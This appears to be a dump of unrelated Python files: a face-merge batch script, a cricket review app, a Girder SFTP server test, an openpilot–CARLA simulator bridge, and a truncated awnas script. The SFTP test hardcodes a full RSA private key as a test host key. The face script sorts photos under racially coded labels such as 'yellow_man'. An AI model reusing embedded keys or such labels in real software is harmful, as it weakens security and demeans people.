def ymm():
    """Merge every yellow-male template with every yellow-male source face.

    For each merge_rate in 30..90 (step 10), POST one request per
    (template, source) pair and save any base64-decodable response body as
    'yellow_man_<rate>_NO<count>.jpg'. *count* numbers successfully saved
    images across all rates, matching the original unrolled code, which
    repeated the same loop body seven times with only the rate changed.
    """
    count = 0
    for rate in (30, 40, 50, 60, 70, 80, 90):
        for template_url in yellow_m:
            for merge_url in ym:
                params_up = {
                    "merge_url": "%s" % merge_url,
                    "template_rectangle": "",
                    "template_url": "%s" % template_url,
                    "merge_rectangle": "",
                    "merge_rate": rate,
                }
                print(params_up)
                r = requests.post(url_test, json=params_up)
                try:
                    img_data = base64.b64decode(r.text)
                    count = count + 1
                    # Context manager closes the file even on write errors.
                    with open('yellow_man_%s_NO%s.jpg' % (rate, count), 'wb') as f:
                        f.write(img_data)
                except Exception:
                    # Non-image (error) responses fail to decode; skip them.
                    pass
def yww():
    """Merge every yellow-woman template with every photo at blend rates 30-90.

    For each merge_rate in (30, 40, ..., 90), POST every (template, photo)
    pair to the face-merge API and save any base64-decodable response body as
    'yellow_woman_<rate>_NO<count>.jpg'.

    ``count`` increments only on a successful decode and is shared across all
    rates, matching the original sequential file numbering. Relies on the
    module-level ``yellow_w``, ``yw`` and ``url_test`` globals.
    """
    count = 0
    # The original code repeated the same double loop once per rate; iterate
    # over the rates instead so the request logic exists only once.
    for rate in (30, 40, 50, 60, 70, 80, 90):
        for template in yellow_w:
            for photo in yw:
                params_up = {
                    "merge_url": "%s" % photo,
                    "template_rectangle": "",
                    "template_url": "%s" % template,
                    "merge_rectangle": "",
                    "merge_rate": rate
                }
                print(params_up)
                r = requests.post(url_test, json=params_up)
                strs = r.text
                try:
                    imgadata = base64.b64decode(strs)
                except Exception:
                    # Response body was not valid base64 (e.g. an API error
                    # payload); skip it, as the original best-effort code did.
                    continue
                count = count + 1
                # Context manager guarantees the file is closed even on error.
                with open('yellow_woman_%s_NO%s.jpg' % (rate, count), 'wb') as out:
                    out.write(imgadata)
if __name__ == '__main__':
    # Launch one worker process per template/photo category.
    # (template_url is the template face; merge_url is the user's own photo)
    for worker in (bmm, bww, www, wmm, ymm, yww):
        Process(target=worker).start()
|
main.py | import tkinter
import cv2
import PIL.Image,PIL.ImageTk
from functools import partial
import threading
import time
import imutils
# Video clip under review, and a toggle controlling whether the
# "Decision Pending" overlay is drawn on the next play() call.
stream = cv2.VideoCapture("clip.mp4")
flag = True
def play(speed):
    """Jump the video by `speed` frames (negative = rewind) and draw the frame.

    Mutates the global `flag`, which alternates the "Decision Pending" text
    overlay between successive calls.
    """
    global flag
    print(f"You clicked on play. Speed is {speed}")
    # Seek relative to the current frame position.
    frame1 = stream.get(cv2.CAP_PROP_POS_FRAMES)
    stream.set(cv2.CAP_PROP_POS_FRAMES, frame1 + speed)
    grabbed, frame = stream.read()
    if not grabbed:
        # End of stream (or seek past either end): quit the application.
        exit()
    # OpenCV decodes frames as BGR; convert so colors render correctly in Tk.
    # (pending() already does this conversion — this makes play() consistent.)
    frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
    frame = imutils.resize(frame, width=SET_WIDTH, height=SET_HEIGHT)
    frame = PIL.ImageTk.PhotoImage(image=PIL.Image.fromarray(frame))
    canvas.image = frame  # keep a reference so Tk does not garbage-collect it
    canvas.create_image(0, 0, image=frame, anchor=tkinter.NW)
    if flag:
        canvas.create_text(134, 26, fill="black", font="Times 26 bold", text="Decision Pending")
    # NOTE(review): toggling means the overlay appears only on every other
    # click — looks intentional but worth confirming with the author.
    flag = not flag
def _show_image(path):
    """Load `path`, convert BGR->RGB, resize, and paint it on the canvas."""
    frame = cv2.cvtColor(cv2.imread(path), cv2.COLOR_BGR2RGB)
    frame = imutils.resize(frame, width=SET_WIDTH, height=SET_HEIGHT)
    frame = PIL.ImageTk.PhotoImage(image=PIL.Image.fromarray(frame))
    canvas.image = frame  # keep a reference so Tk does not garbage-collect it
    canvas.create_image(0, 0, image=frame, anchor=tkinter.NW)


def pending(decision):
    """Play the review sequence on the canvas (runs on a background thread).

    Shows the "Decision Pending" screen for 1.5s, the sponsor screen for
    2.5s, then the final verdict image.

    :param decision: 'out' for the OUT graphic, anything else for Not Out.
    """
    # 1. Decision pending image
    _show_image("DecisionPending.png")
    # 2. Wait 1.5 seconds
    time.sleep(1.5)
    # 3. Sponsor image
    _show_image("Sponsor.png")
    # 4. Wait 2.5 seconds
    time.sleep(2.5)
    # 5. Final out / not-out image
    _show_image("OUT!.png" if decision == 'out' else "NotOut.png")
def out():
    """Kick off the 'out' decision sequence on a background daemon thread."""
    worker = threading.Thread(target=pending, args=("out",), daemon=True)
    worker.start()
    print("Player is Out!")
def notout():
    """Kick off the 'not out' decision sequence on a background daemon thread."""
    worker = threading.Thread(target=pending, args=("notout",), daemon=True)
    worker.start()
    print("Player is Not-Out!")
# Canvas dimensions used for every displayed frame/image.
SET_HEIGHT = 500
SET_WIDTH = 500

# Main window showing a welcome image on a Tk canvas.
window = tkinter.Tk()
window.title("DD DRS")
cv_img = cv2.cvtColor(cv2.imread("Welcome.png"), cv2.COLOR_BGR2RGB)
canvas = tkinter.Canvas(window, height=SET_HEIGHT, width=SET_WIDTH)
photo = PIL.ImageTk.PhotoImage(image=PIL.Image.fromarray(cv_img))
image_on_canvas = canvas.create_image(0, 0, anchor=tkinter.NW, image=photo)
canvas.pack()

# Playback buttons: step the clip backward/forward by 25 (fast) or 2 (slow) frames.
btn = tkinter.Button(window, text="<< Previous (fast)", width=50, command=partial(play, -25))
btn.pack()
btn = tkinter.Button(window, text="<< Previous (slow)", width=50, command=partial(play, -2))
btn.pack()
btn = tkinter.Button(window, text="Next (slow) >>", width=50, command=partial(play, 2))
btn.pack()
btn = tkinter.Button(window, text="Next (fast) >>", width=50, command=partial(play, 25))
btn.pack()
# Verdict buttons: each launches the decision sequence on a background thread.
btn = tkinter.Button(window, text="Give Out", width=50, command=out)
btn.pack()
btn = tkinter.Button(window, text="Give Not Out", width=50, command=notout)
btn.pack()
window.mainloop()
sftp_test.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
###############################################################################
# Copyright 2016 Kitware Inc.
#
# Licensed under the Apache License, Version 2.0 ( the "License" );
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###############################################################################
import paramiko
import six
import socket
import stat
import threading
from .. import base
from girder.api import sftp
from girder.models.collection import Collection
from girder.models.folder import Folder
from girder.models.upload import Upload
from girder.models.user import User
from six.moves import StringIO
# Module-level SFTP server instance, created in setUpModule().
server = None
# Port the test SFTP server listens on.
TEST_PORT = 10551
# Throwaway RSA host key for the test server only — not used anywhere real.
TEST_KEY = paramiko.RSAKey.from_private_key(StringIO("""-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAwdH5tlaZu52adYvW57DcAFknzOKX8+/axDmQdTcg1HwEOnT2
TMSFGciwUQMmya+0i23ZOUtZQutj8fb66szrBZ7qpIvSG6TRyxGuM6PkfAUcBCHO
TGFzaJPnnvUXC8dlxoUIdBaUCmSblvj2q2CTNy53ybAmiiSpahjvBO16pvjbNn+i
EGucSQn71OTMhoSOWtS/VcJC6JPd6kxSdl1EiESbOrjAdNDKMBnfYCkxPG4ulAqe
y5jpfgQiUC0Q3CoWbj/ybAv73JsFndPcpvI8n5EsXeptuWI4CXSorYOuVwURLuzP
z1PkI4ZsYnSnuQG/GReAZnwVDaVJ/uhYMMs1sQIDAQABAoIBADKOmguFBW7aCntU
8cbX7Fsu5mHcTXS1ASSkO1lH+wlSHCw/bCvUKz/xiIRpRQnhCkBAdCQs0mjRS+3G
1ea/cyKxNFWdnz3UvWCyCPWxb50mHAu74bssxFToF8fv+IX7CkJBW1YkuZMIcUlt
QbKsa1o+hcKXb0YjkAl73YU0iQTaet7B1x1X0qkVPEWWURTg3z65TNI96t8p28dh
4HgEoU0Jtfsfzb7u1H4/m3Q28J1S+cTkER/VIgLzMeYXr2MooIQc3QAMXATpXkhM
y6u0LYh+kW1XD4ZnyzTp49BMf76rS8VhsYN6f+jLhJUf/5O+m8NFGuCq15TFyQAH
vMBxPRECgYEA4+fxYuuOq+SilYpejD4EMwvrClixHOfTojlnAyUaJZSnyVp/Y4l+
QmFmbNpfRKN1fv24e9f9CmA8nd5A3kxBjJFhzaaxbFG+jI47fqOu9NadXPHaxvyq
BI2aHx4sqp/Z/ct/klht5hxD8UFMRFbaaLYAojKg1nL0g/88wwwN9LUCgYEA2bZh
873OGT7sNXHin2rXD5XEYXqjLy51hed4ZdtJXFrKhg8ozWqaOZ79GXustdRanzTV
zDeTweI0hg7adbKyBNeuQF8VSOK6ws2wPPCuUbQTVYaepqPuT+VhzAB1GVJ1uF/T
YxgqXOvg9QwnZ4Fjlv3b/52R89bTP+Yr6GcQdo0CgYAvLQ38igIodtVo2xGjOhso
bekjZSSUdTCLvhIixoVZDiKFPaRs+EMYfozzL2jVDnj95otPp3ALu8wQabdHzMUs
0dNK/JxxbaJh+fc6yasnp10/phjBY//VnXIvytE4KIq5TGyF4KQvI960i+27n7bq
QfJzoMNGYNlYkXcEcPRamQKBgQCVCYWElirAnZKWA6BgAYO3547ILGwJoIRTZmHF
WJif4IdDvpzwAkoRqAUbrM5Oq1BeLI0vf9xmnbPXEdP7PpkfN4bSCkVH3+557NT4
4spypBOYOM/iw9YgW6bXQHjpHMn5rZ/H9oMJmXAmUGupL6o9cwtnsTZ49lcnJypn
riZXAQKBgQCgiJ/A11HX7fUgFzBB9no2Sy1hS3u1Ld35nZf7RDegVoEn/UdWdOxn
H2T9t0EzIoSqkfPRrsqN8sv/TMIohS6frOpBojEvwUs5mxjVwswq/QgBSV2FqYck
VeccLgZzTSMNzCDMbtM+zGG5WktzFojrMIhfD0SM3CB3jECF+Dfdtg==
-----END RSA PRIVATE KEY-----
"""))
def setUpModule():
    """Start the Girder SFTP test server on a background daemon thread."""
    global server
    server = sftp.SftpServer(('localhost', TEST_PORT), TEST_KEY)
    thread = threading.Thread(target=server.serve_forever, daemon=True)
    thread.start()
def tearDownModule():
    """Stop the SFTP test server (if started) and drop all test databases."""
    if server:
        # shutdown() stops serve_forever(); server_close() releases the socket.
        server.shutdown()
        server.server_close()
    base.dropAllTestDatabases()
class SftpTestCase(base.TestCase):
    """Exercises Girder's SFTP service end to end: password and anonymous
    authentication, directory listing, chunked file reads, and stat/lstat."""

    def testSftpService(self):
        # Create one admin and one regular user.
        users = ({
            'email': 'admin@email.com',
            'login': 'admin',
            'firstName': 'First',
            'lastName': 'Last',
            'password': 'passwd'
        }, {
            'email': 'regularuser@email.com',
            'login': 'regularuser',
            'firstName': 'First',
            'lastName': 'Last',
            'password': 'passwd'
        })
        admin, user = [User().createUser(**user) for user in users]

        # One public and one private collection, both owned by admin.
        collections = ({
            'name': 'public collection',
            'public': True,
            'creator': admin
        }, {
            'name': 'private collection',
            'public': False,
            'creator': admin
        })

        privateFolder = Folder().findOne({
            'parentCollection': 'user',
            'parentId': user['_id'],
            'name': 'Private'
        })
        self.assertIsNotNone(privateFolder)

        # An 11-byte file in the regular user's Private folder; its size is
        # asserted against st_size below.
        Upload().uploadFromFile(
            six.BytesIO(b'hello world'), size=11, name='test.txt', parentType='folder',
            parent=privateFolder, user=user)

        for coll in collections:
            Collection().createCollection(**coll)

        client = paramiko.SSHClient()
        client.load_system_host_keys()
        client.set_missing_host_key_policy(paramiko.AutoAddPolicy())

        # Incorrect password should raise authentication error
        with self.assertRaises(paramiko.AuthenticationException):
            client.connect(
                'localhost', TEST_PORT, username='admin', password='badpass', look_for_keys=False,
                allow_agent=False)

        # Authenticate as admin
        client.connect(
            'localhost', TEST_PORT, username='admin', password='passwd', look_for_keys=False,
            allow_agent=False)
        sftpClient = client.open_sftp()
        self.assertEqual(sftpClient.listdir('/'), ['collection', 'user'])

        # Listing an invalid top level entity should fail
        with self.assertRaises(IOError):
            sftpClient.listdir('/foo')

        # Test listing of users, collections, and subfolders
        self.assertEqual(set(sftpClient.listdir('/user/')), {'admin', 'regularuser'})
        self.assertEqual(set(sftpClient.listdir('/user/admin')), {'Public', 'Private'})
        self.assertEqual(
            set(sftpClient.listdir('/collection')), {'public collection', 'private collection'})

        self.assertEqual(sftpClient.listdir('/user/regularuser/Private'), ['test.txt'])
        # An item is exposed as a directory containing its file(s).
        self.assertEqual(sftpClient.listdir('/user/regularuser/Private/test.txt'), ['test.txt'])

        with six.assertRaisesRegex(self, IOError, 'No such file'):
            sftpClient.listdir('/user/nonexistent')

        with six.assertRaisesRegex(self, IOError, 'No such file'):
            sftpClient.file('/user/regularuser/Private')

        # Read a file using small enough buf size to require multiple chunks internally.
        file = sftpClient.file('/user/regularuser/Private/test.txt/test.txt', 'r', bufsize=4)
        self.assertEqual(file.read(2), b'he')
        self.assertEqual(file.read(), b'llo world')

        # Make sure we enforce max buffer length
        tmp, sftp.MAX_BUF_LEN = sftp.MAX_BUF_LEN, 2
        file = sftpClient.file('/user/regularuser/Private/test.txt/test.txt', 'r', bufsize=4)
        with self.assertRaises(IOError):
            file.read()
        sftp.MAX_BUF_LEN = tmp

        # Test stat capability
        info = sftpClient.stat('/user/regularuser/Private')
        self.assertTrue(stat.S_ISDIR(info.st_mode))
        self.assertFalse(stat.S_ISREG(info.st_mode))
        self.assertEqual(info.st_mode & 0o777, 0o777)

        # lstat should also work
        info = sftpClient.lstat('/user/regularuser/Private/test.txt/test.txt')
        self.assertFalse(stat.S_ISDIR(info.st_mode))
        self.assertTrue(stat.S_ISREG(info.st_mode))
        self.assertEqual(info.st_size, 11)
        self.assertEqual(info.st_mode & 0o777, 0o777)

        # File stat implementations should agree
        info = file.stat()
        self.assertFalse(stat.S_ISDIR(info.st_mode))
        self.assertTrue(stat.S_ISREG(info.st_mode))
        self.assertEqual(info.st_size, 11)
        self.assertEqual(info.st_mode & 0o777, 0o777)

        # Make sure we can stat the top-level entities
        for path in ('/', '/user', '/collection'):
            info = sftpClient.stat(path)
            self.assertTrue(stat.S_ISDIR(info.st_mode))
            self.assertFalse(stat.S_ISREG(info.st_mode))
            self.assertEqual(info.st_mode & 0o777, 0o777)

        sftpClient.close()
        client.close()

        # Test that any username other than anonymous will fail using auth_none.
        sock = socket.socket()
        sock.connect(('localhost', TEST_PORT))
        trans = paramiko.Transport(sock)
        trans.connect()
        with self.assertRaises(paramiko.ssh_exception.BadAuthenticationType):
            trans.auth_none('')
        trans.close()
        sock.close()

        sock = socket.socket()
        sock.connect(('localhost', TEST_PORT))
        trans = paramiko.Transport(sock)
        trans.connect()
        with self.assertRaises(paramiko.ssh_exception.BadAuthenticationType):
            trans.auth_none('eponymous')
        trans.close()
        sock.close()

        # Test that a connection can be opened for anonymous access using auth_none.
        sock = socket.socket()
        sock.connect(('localhost', TEST_PORT))
        trans = paramiko.Transport(sock)
        trans.connect()
        trans.auth_none(username='anonymous')
        sftpClient = paramiko.SFTPClient.from_transport(trans)

        # Only public data should be visible
        self.assertEqual(set(sftpClient.listdir('/user')), {'admin', 'regularuser'})
        self.assertEqual(sftpClient.listdir('/collection'), ['public collection'])
        self.assertEqual(sftpClient.listdir('/user/admin'), ['Public'])

        # Make sure the client cannot distinguish between a resource that does not exist
        # vs. one they simply don't have read access to.
        with six.assertRaisesRegex(self, IOError, 'No such file'):
            sftpClient.listdir('/user/regularuser/Private')

        with six.assertRaisesRegex(self, IOError, 'No such file'):
            sftpClient.file('/user/regularuser/Private/test.txt/test.txt', 'r')

        sftpClient.close()
        trans.close()
        sock.close()

        # Test anonymous access
        client = paramiko.SSHClient()
        client.load_system_host_keys()
        client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        client.connect(
            'localhost', TEST_PORT, username='anonymous', password='', look_for_keys=False,
            allow_agent=False)
        sftpClient = client.open_sftp()

        # Only public data should be visible
        self.assertEqual(set(sftpClient.listdir('/user')), {'admin', 'regularuser'})
        self.assertEqual(sftpClient.listdir('/collection'), ['public collection'])
        self.assertEqual(sftpClient.listdir('/user/admin'), ['Public'])

        # Make sure the client cannot distinguish between a resource that does not exist
        # vs. one they simply don't have read access to.
        with six.assertRaisesRegex(self, IOError, 'No such file'):
            sftpClient.listdir('/user/regularuser/Private')

        with six.assertRaisesRegex(self, IOError, 'No such file'):
            sftpClient.file('/user/regularuser/Private/test.txt/test.txt', 'r')

        sftpClient.close()
        client.close()
|
bridge.py | #!/usr/bin/env python3
# type: ignore
import carla # pylint: disable=import-error
import time
import math
import atexit
import numpy as np
import threading
import cereal.messaging as messaging
import argparse
from common.params import Params
from common.realtime import Ratekeeper, DT_DMON
from lib.can import can_function
from selfdrive.car.honda.values import CruiseButtons
from selfdrive.test.helpers import set_params_enabled
parser = argparse.ArgumentParser(description='Bridge between CARLA and openpilot.')
parser.add_argument('--joystick', action='store_true')
parser.add_argument('--town', type=str, default='Town04')
parser.add_argument('--spawn_point', dest='num_selected_spawn_point',
                    type=int, default=16)
# Weather parameters, passed straight through to carla.WeatherParameters in go().
parser.add_argument('--cloudyness', default=0.1, type=float)
parser.add_argument('--precipitation', default=0.0, type=float)
parser.add_argument('--precipitation_deposits', default=0.0, type=float)
parser.add_argument('--wind_intensity', default=0.0, type=float)
parser.add_argument('--sun_azimuth_angle', default=15.0, type=float)
parser.add_argument('--sun_altitude_angle', default=75.0, type=float)
args = parser.parse_args()

# Camera frame size (width, height) published on roadCameraState.
W, H = 1164, 874
REPEAT_COUNTER = 5       # iterations over which manual controls ease back to zero
PRINT_DECIMATION = 100   # print status once every N frames of the main loop
STEER_RATIO = 15.        # scaling between steering command and CARLA wheel angle

pm = messaging.PubMaster(['roadCameraState', 'sensorEvents', 'can'])
sm = messaging.SubMaster(['carControl', 'controlsState'])
class VehicleState:
    """Mutable snapshot of the simulated car, shared with the CAN thread."""

    def __init__(self):
        self.speed = 0            # vehicle speed
        self.angle = 0            # steering angle
        self.cruise_button = 0    # last cruise button press to forward on CAN
        self.is_engaged = False   # whether openpilot is currently engaged
def steer_rate_limit(old, new):
    """Clamp the steering target so it moves at most 0.5 degrees from `old`.

    Returns `new` unchanged when it is within the limit, otherwise the
    nearest allowed value.
    """
    limit = 0.5
    if new > old + limit:
        return old + limit
    if new < old - limit:
        return old - limit
    return new
# Running count of camera frames published (incremented in cam_callback).
frame_id = 0


def cam_callback(image):
    """CARLA camera listener: publish the frame as a roadCameraState message.

    :param image: CARLA sensor image with `.raw_data` (BGRA bytes) and `.frame`.
    """
    global frame_id
    img = np.frombuffer(image.raw_data, dtype=np.dtype("uint8"))
    img = np.reshape(img, (H, W, 4))
    img = img[:, :, [0, 1, 2]].copy()  # drop the alpha channel
    dat = messaging.new_message('roadCameraState')
    dat.roadCameraState = {
        "frameId": image.frame,
        # tobytes() replaces tostring(), which is deprecated and removed in
        # modern numpy; the produced bytes are identical.
        "image": img.tobytes(),
        "transform": [1.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 1.0]
    }
    pm.send('roadCameraState', dat)
    frame_id += 1
def imu_callback(imu):
    """CARLA IMU listener: publish accelerometer + gyro as sensorEvents."""
    dat = messaging.new_message('sensorEvents', 2)
    # Entry 0: accelerometer reading.
    dat.sensorEvents[0].sensor = 4
    dat.sensorEvents[0].type = 0x10
    dat.sensorEvents[0].init('acceleration')
    dat.sensorEvents[0].acceleration.v = [imu.accelerometer.x, imu.accelerometer.y, imu.accelerometer.z]
    # copied these numbers from locationd
    dat.sensorEvents[1].sensor = 5
    dat.sensorEvents[1].type = 0x10
    dat.sensorEvents[1].init('gyroUncalibrated')
    dat.sensorEvents[1].gyroUncalibrated.v = [imu.gyroscope.x, imu.gyroscope.y, imu.gyroscope.z]
    pm.send('sensorEvents', dat)
def panda_state_function():
    """Publish a fake pandaState twice a second so controls believe a panda
    is connected with ignition on and controls allowed."""
    pm = messaging.PubMaster(['pandaState'])
    while True:
        msg = messaging.new_message('pandaState')
        msg.valid = True
        msg.pandaState = {
            'ignitionLine': True,
            'pandaType': "blackPanda",
            'controlsAllowed': True,
            'safetyModel': 'hondaNidec'
        }
        pm.send('pandaState', msg)
        time.sleep(0.5)
def fake_gps():
    """Publish empty gpsLocationExternal messages at ~100 Hz.

    TODO: read GPS from CARLA instead of sending default-valued messages.
    """
    pm = messaging.PubMaster(['gpsLocationExternal'])
    while True:
        msg = messaging.new_message('gpsLocationExternal')
        pm.send('gpsLocationExternal', msg)
        time.sleep(0.01)
def fake_driver_monitoring():
    """Publish driver-monitoring messages reporting an attentive driver so
    openpilot never disengages for distraction."""
    pm = messaging.PubMaster(['driverState', 'driverMonitoringState'])
    while True:
        # dmonitoringmodeld output
        state = messaging.new_message('driverState')
        state.driverState.faceProb = 1.0
        pm.send('driverState', state)
        # dmonitoringd output
        monitoring = messaging.new_message('driverMonitoringState')
        monitoring.driverMonitoringState = {
            "faceDetected": True,
            "isDistracted": False,
            "awarenessStatus": 1.,
            "isRHDDEPRECATED": False,
        }
        pm.send('driverMonitoringState', monitoring)
        time.sleep(DT_DMON)
def can_function_runner(vs):
    """Drive the fake CAN bus from the shared VehicleState `vs` at ~100 Hz."""
    counter = 0
    while True:
        can_function(pm, vs.speed, vs.angle, counter, vs.cruise_button, vs.is_engaged)
        time.sleep(0.01)
        counter += 1
def go(q):
    """Main CARLA bridge loop: spawn the car and sensors, feed manual or
    openpilot controls into CARLA, and report vehicle state back over CAN.

    :param q: multiprocessing.Queue of command strings from the keyboard or
        joystick poller, e.g. "steer_0.5", "throttle_1", "cruise_down".
    """
    # setup CARLA
    client = carla.Client("127.0.0.1", 2000)
    client.set_timeout(10.0)
    world = client.load_world(args.town)
    blueprint_library = world.get_blueprint_library()
    world_map = world.get_map()

    vehicle_bp = blueprint_library.filter('vehicle.tesla.*')[0]
    spawn_points = world_map.get_spawn_points()
    assert len(spawn_points) > args.num_selected_spawn_point, \
        f'''No spawn point {args.num_selected_spawn_point}, try a value between 0 and
        {len(spawn_points)} for this town.'''
    spawn_point = spawn_points[args.num_selected_spawn_point]
    vehicle = world.spawn_actor(vehicle_bp, spawn_point)
    max_steer_angle = vehicle.get_physics_control().wheels[0].max_steer_angle

    # make tires less slippery
    # wheel_control = carla.WheelPhysicsControl(tire_friction=5)
    physics_control = vehicle.get_physics_control()
    physics_control.mass = 2326
    # physics_control.wheels = [wheel_control]*4
    physics_control.torque_curve = [[20.0, 500.0], [5000.0, 500.0]]
    physics_control.gear_switch_time = 0.0
    vehicle.apply_physics_control(physics_control)

    # Road camera feeding cam_callback -> roadCameraState.
    blueprint = blueprint_library.find('sensor.camera.rgb')
    blueprint.set_attribute('image_size_x', str(W))
    blueprint.set_attribute('image_size_y', str(H))
    blueprint.set_attribute('fov', '70')
    blueprint.set_attribute('sensor_tick', '0.05')
    transform = carla.Transform(carla.Location(x=0.8, z=1.45))
    camera = world.spawn_actor(blueprint, transform, attach_to=vehicle)
    camera.listen(cam_callback)

    world.set_weather(carla.WeatherParameters(
        cloudyness=args.cloudyness,
        precipitation=args.precipitation,
        precipitation_deposits=args.precipitation_deposits,
        wind_intensity=args.wind_intensity,
        sun_azimuth_angle=args.sun_azimuth_angle,
        sun_altitude_angle=args.sun_altitude_angle
    ))

    # reenable IMU
    imu_bp = blueprint_library.find('sensor.other.imu')
    imu = world.spawn_actor(imu_bp, transform, attach_to=vehicle)
    imu.listen(imu_callback)

    def destroy():
        # Tear down CARLA actors on process exit.
        print("clean exit")
        imu.destroy()
        camera.destroy()
        vehicle.destroy()
        print("done")
    atexit.register(destroy)

    vehicle_state = VehicleState()

    # launch fake car threads
    threading.Thread(target=panda_state_function).start()
    threading.Thread(target=fake_driver_monitoring).start()
    threading.Thread(target=fake_gps).start()
    threading.Thread(target=can_function_runner, args=(vehicle_state,)).start()

    # can loop
    rk = Ratekeeper(100, print_delay_threshold=0.05)

    # init
    throttle_ease_out_counter = REPEAT_COUNTER
    brake_ease_out_counter = REPEAT_COUNTER
    steer_ease_out_counter = REPEAT_COUNTER

    vc = carla.VehicleControl(throttle=0, steer=0, brake=0, reverse=False)
    is_openpilot_engaged = False
    throttle_out = steer_out = brake_out = 0
    throttle_op = steer_op = brake_op = 0
    throttle_manual = steer_manual = brake_manual = 0

    old_steer = old_brake = old_throttle = 0
    throttle_manual_multiplier = 0.7  # keyboard signal is always 1
    brake_manual_multiplier = 0.7  # keyboard signal is always 1
    steer_manual_multiplier = 45 * STEER_RATIO  # keyboard signal is always 1

    while 1:
        # 1. Read the throttle, steer and brake from op or manual controls
        # 2. Set instructions in Carla
        # 3. Send current carstate to op via can
        cruise_button = 0
        throttle_out = steer_out = brake_out = 0
        throttle_op = steer_op = brake_op = 0
        throttle_manual = steer_manual = brake_manual = 0

        # --------------Step 1-------------------------------
        if not q.empty():
            message = q.get()
            m = message.split('_')
            if m[0] == "steer":
                steer_manual = float(m[1])
                is_openpilot_engaged = False
            if m[0] == "throttle":
                throttle_manual = float(m[1])
                is_openpilot_engaged = False
            if m[0] == "brake":
                brake_manual = float(m[1])
                is_openpilot_engaged = False
            if m[0] == "reverse":
                # in_reverse = not in_reverse
                cruise_button = CruiseButtons.CANCEL
                is_openpilot_engaged = False
            if m[0] == "cruise":
                if m[1] == "down":
                    cruise_button = CruiseButtons.DECEL_SET
                    is_openpilot_engaged = True
                if m[1] == "up":
                    cruise_button = CruiseButtons.RES_ACCEL
                    is_openpilot_engaged = True
                if m[1] == "cancel":
                    cruise_button = CruiseButtons.CANCEL
                    is_openpilot_engaged = False

            throttle_out = throttle_manual * throttle_manual_multiplier
            steer_out = steer_manual * steer_manual_multiplier
            brake_out = brake_manual * brake_manual_multiplier

            # steer_out = steer_out
            # steer_out = steer_rate_limit(old_steer, steer_out)
            old_steer = steer_out
            old_throttle = throttle_out
            old_brake = brake_out
            # print('message',old_throttle, old_steer, old_brake)

        if is_openpilot_engaged:
            # Take actuator commands from openpilot instead of manual input.
            sm.update(0)
            throttle_op = sm['carControl'].actuators.gas  # [0,1]
            brake_op = sm['carControl'].actuators.brake  # [0,1]
            steer_op = sm['controlsState'].angleSteersDes  # degrees [-180,180]

            throttle_out = throttle_op
            steer_out = steer_op
            brake_out = brake_op

            steer_out = steer_rate_limit(old_steer, steer_out)
            old_steer = steer_out

            # OP Exit conditions
            # if throttle_out > 0.3:
            #   cruise_button = CruiseButtons.CANCEL
            #   is_openpilot_engaged = False
            # if brake_out > 0.3:
            #   cruise_button = CruiseButtons.CANCEL
            #   is_openpilot_engaged = False
            # if steer_out > 0.3:
            #   cruise_button = CruiseButtons.CANCEL
            #   is_openpilot_engaged = False
        else:
            # Ease released manual controls back to zero over REPEAT_COUNTER
            # iterations instead of dropping them instantly.
            if throttle_out == 0 and old_throttle > 0:
                if throttle_ease_out_counter > 0:
                    throttle_out = old_throttle
                    throttle_ease_out_counter += -1
                else:
                    throttle_ease_out_counter = REPEAT_COUNTER
                    old_throttle = 0

            if brake_out == 0 and old_brake > 0:
                if brake_ease_out_counter > 0:
                    brake_out = old_brake
                    brake_ease_out_counter += -1
                else:
                    brake_ease_out_counter = REPEAT_COUNTER
                    old_brake = 0

            if steer_out == 0 and old_steer != 0:
                if steer_ease_out_counter > 0:
                    steer_out = old_steer
                    steer_ease_out_counter += -1
                else:
                    steer_ease_out_counter = REPEAT_COUNTER
                    old_steer = 0

        # --------------Step 2-------------------------------
        # Convert steering degrees to CARLA's normalized [-1, 1] range, then
        # back, so steer_out/old_steer reflect the clipped value.
        steer_carla = steer_out / (max_steer_angle * STEER_RATIO * -1)
        steer_carla = np.clip(steer_carla, -1, 1)
        steer_out = steer_carla * (max_steer_angle * STEER_RATIO * -1)
        old_steer = steer_carla * (max_steer_angle * STEER_RATIO * -1)

        vc.throttle = throttle_out / 0.6
        vc.steer = steer_carla
        vc.brake = brake_out
        vehicle.apply_control(vc)

        # --------------Step 3-------------------------------
        vel = vehicle.get_velocity()
        speed = math.sqrt(vel.x**2 + vel.y**2 + vel.z**2)  # in m/s
        vehicle_state.speed = speed
        vehicle_state.angle = steer_out
        vehicle_state.cruise_button = cruise_button
        vehicle_state.is_engaged = is_openpilot_engaged

        if rk.frame % PRINT_DECIMATION == 0:
            print("frame: ", "engaged:", is_openpilot_engaged, "; throttle: ", round(vc.throttle, 3), "; steer(c/deg): ", round(vc.steer, 3), round(steer_out, 3), "; brake: ", round(vc.brake, 3))

        rk.keep_time()
if __name__ == "__main__":
    # make sure params are in a good state
    params = Params()
    params.clear_all()
    set_params_enabled()
    params.delete("Offroad_ConnectivityNeeded")
    params.put("CalibrationParams", '{"calib_radians": [0,0,0], "valid_blocks": 20}')

    # Run the CARLA bridge in a daemon subprocess; the queue carries
    # keyboard/joystick command strings into go().
    from multiprocessing import Process, Queue
    q = Queue()
    p = Process(target=go, args=(q,))
    p.daemon = True
    p.start()

    if args.joystick:
        # start input poll for joystick
        from lib.manual_ctrl import wheel_poll_thread
        wheel_poll_thread(q)
    else:
        # start input poll for keyboard
        from lib.keyboard_ctrl import keyboard_poll_thread
        keyboard_poll_thread(q)
|
run_derive_ckpts.py | # pylint: disable=invalid-name,missing-docstring,redefined-outer-name
# -- coding: utf-8 -*-
import os
import copy
import argparse
import subprocess
import multiprocessing
from io import StringIO
import yaml
# Default GPU ids to spread jobs across; overridden by --gpus.
GPUs = [0, 1, 2, 3]

# awnas home directory (overridable via the AWNAS_HOME environment variable).
_HOME_DIR = os.path.abspath(os.path.expanduser(os.environ.get("AWNAS_HOME", "~/awnas")))

parser = argparse.ArgumentParser()
parser.add_argument("--cfg-file", default=None)
